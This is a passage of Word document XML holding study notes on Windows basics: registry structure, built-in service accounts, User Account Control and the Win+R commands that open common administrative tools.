        <w:t>Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:t xml:space="preserve"> is like a folder inside the registry. </w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keys contain subkeys and values</w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:t xml:space="preserve"> (settings). </w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Values store actual data</w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:t xml:space="preserve">, like file paths, system settings, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">environment variables </w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:t>and program configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F86D62" w14:textId="77777777" w:rsidR="006D0EC1" w:rsidRDefault="006D0EC1" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095380DD" w14:textId="30EF2202" w:rsidR="006D0EC1" w:rsidRDefault="006D0EC1" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ex of registry path: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D0EC1">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D0EC1">
        <w:t>\Services\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B3F78" w14:textId="0BB03CD0" w:rsidR="006D0EC1" w:rsidRDefault="006D0EC1" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="006D0EC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HK</w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:t> stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HKEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:t>"Handle to a Key"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:t>each of root key</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="006D0EC1">
        <w:t xml:space="preserve"> begins with HKEY.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF397EB" w14:textId="749CF184" w:rsidR="00843C5A" w:rsidRDefault="00843C5A" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>to See and Edit</w:t>
      </w:r>
      <w:r w:rsidR="00823102">
        <w:t xml:space="preserve"> the registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C5A">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C5A">
        <w:t>Win + R, type regedit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1A7B6" w14:textId="77777777" w:rsidR="006D0EC1" w:rsidRPr="00823102" w:rsidRDefault="006D0EC1" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BD383C" w14:textId="5AB1BA96" w:rsidR="00823102" w:rsidRPr="00D25CA5" w:rsidRDefault="00823102" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E233F86" w14:textId="77777777" w:rsidR="00823102" w:rsidRDefault="00823102" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>used by the operating system to perform internal tasks. It has full access to all files and resources available on the host with even higher privileges than administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7948B68B" w14:textId="77777777" w:rsidR="00823102" w:rsidRDefault="00823102" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>Default account used to run Windows services with "minimum" privileges. It will use anonymous connections over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585AC292" w14:textId="5C94397D" w:rsidR="00823102" w:rsidRDefault="00823102" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72BD0">
        <w:t>Default account used to run Windows services with "minimum" privileges. It will use the computer credentials to authenticate through the network</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72BD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08290248" w14:textId="6618F111" w:rsidR="00A44DD5" w:rsidRDefault="00823102" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Win + R </w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:t>lusrmgr.msc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA72B75" w14:textId="77777777" w:rsidR="00823102" w:rsidRPr="00823102" w:rsidRDefault="00823102" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29341084" w14:textId="59E6D93E" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When a user account is created, a profile is created for the user (The creation of the user's profile is done upon initial login).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EEC74F" w14:textId="36A178A5" w:rsidR="00823102" w:rsidRDefault="0084378D" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">User Account Control (UAC) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">like access Control Between users </w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t xml:space="preserve">helps prevent malware from damaging a PC and helps organizations deploy a better-managed desktop. With </w:t>
      </w:r>
      <w:r w:rsidRPr="004E533B">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>UAC, apps and tasks always run in the security context of a non-administrator account</w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t>, unless an administrator specifically authorizes administrator-level access to the system. UAC can block the automatic installation of unauthorized apps and prevent inadvertent changes to system settings</w:t>
      </w:r>
      <w:r w:rsidR="004E533B">
        <w:t>. (Brief: The Idea that Windows Always Work in non-privileged mode even if user is Admin, When Privileged Action required by the Admin User Windows will prompt for confirm if user can do this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A153DE4" w14:textId="5B3DF69E" w:rsidR="00226647" w:rsidRDefault="00226647" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:t>UAC can be manipulated from System Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3614A164" w14:textId="6C4CAF33" w:rsidR="004E533B" w:rsidRPr="0084378D" w:rsidRDefault="004E533B" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r w:rsidRPr="004E533B">
        <w:t>UAC (by default) doesn't apply for the built-in local administrator account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F8D09E" w14:textId="77777777" w:rsidR="002C08AA" w:rsidRDefault="002C08AA" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470E515B" w14:textId="4A996235" w:rsidR="0084378D" w:rsidRPr="00D25CA5" w:rsidRDefault="0084378D" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC5E8F" w14:textId="77777777" w:rsidR="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Configuration utility (</w:t>
      </w:r>
      <w:r w:rsidR="0084378D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Win + R </w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="0084378D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="0084378D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435E338" w14:textId="7EB480E4" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="0084378D" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="003274C3" w:rsidRPr="0084378D">
        <w:t xml:space="preserve">or advanced troubleshooting, and its main purpose is to help diagnose startup issues. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AC16E" w14:textId="77777777" w:rsidR="0084378D" w:rsidRPr="003274C3" w:rsidRDefault="0084378D" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125AB94F" w14:textId="0DC8472B" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: </w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="0084378D">
        <w:t>(all</w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t xml:space="preserve"> tools can </w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="0084378D">
        <w:t>be viewed</w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t xml:space="preserve"> from system configuration tool</w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="0084378D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83B6A2" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Disk Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010241C4" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Windows Administrative Tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1B8AB" w14:textId="3836FB5A" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Performance Monitor (</w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve">Win + R </w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>perfmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084378D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D36685E" w14:textId="3B685D5D" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>User Account Control</w:t>
      </w:r>
      <w:r w:rsidR="00D31ED5">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D31ED5" w:rsidRPr="0084378D">
        <w:t>Local</w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t xml:space="preserve"> Users and Groups</w:t>
      </w:r>
      <w:r w:rsidR="00D31ED5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve">Win + R </w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D31ED5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>lusrmgr.msc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084378D">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4EA0D6" w14:textId="3A72C449" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Event Viewer</w:t>
      </w:r>
      <w:r w:rsidR="00412609">
        <w:t xml:space="preserve"> (logs), </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00412609" w:rsidRPr="00412609">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Event </w:t>
        </w:r>
        <w:r w:rsidR="00412609">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Log </w:t>
        </w:r>
        <w:r w:rsidR="00412609" w:rsidRPr="00412609">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00412609">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00412609" w:rsidRPr="00412609">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Log </w:t>
        </w:r>
        <w:r w:rsidR="00412609">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Key </w:t>
        </w:r>
        <w:r w:rsidR="00412609" w:rsidRPr="00412609">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084378D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327CFE8B" w14:textId="52485A9B" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Task Scheduler</w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="0084378D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DFB4F" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>System Configuration (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084378D">
        <w:t>MSConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084378D">
        <w:t>) 'most important'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DEACE3" w14:textId="194391E3" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Computer Management (</w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve">Win + R </w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0084378D" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>compmgmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0084378D" w:rsidRPr="0084378D">
        <w:t>) ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t>most important'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B5A3B" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Control Pannel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE16286" w14:textId="7849F8DC" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>Resource monitor (</w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve">Win + R </w:t>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="0084378D" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>resmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084378D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D8764" w14:textId="7A09A736" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>System Information (</w:t>
      </w:r>
      <w:r w:rsidR="008C0880" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve">Win + R </w:t>
      </w:r>
      <w:r w:rsidR="008C0880" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="008C0880" w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F4509">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="D1D1D1" w:themeFill="background2" w:themeFillShade="E6"/>
        </w:rPr>
        <w:t>msinfo32</w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009009EF" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="0084378D" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="0084378D">
        <w:t>System Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D52E41" w14:textId="3EF2898A" w:rsidR="0020196E" w:rsidRDefault="0084378D" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task Manager (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Win+R</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084378D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>taskmgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) to manage (enable/disable) startup items. The System Configuration utility is NOT a startup management program. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226464FC" w14:textId="77777777" w:rsidR="00D25CA5" w:rsidRDefault="00D25CA5" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742EB63D" w14:textId="3F12425D" w:rsidR="00955886" w:rsidRPr="00C00009" w:rsidRDefault="0020196E" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00009">
        <w:rPr>
          <w:b/>
          <w:bCs/>
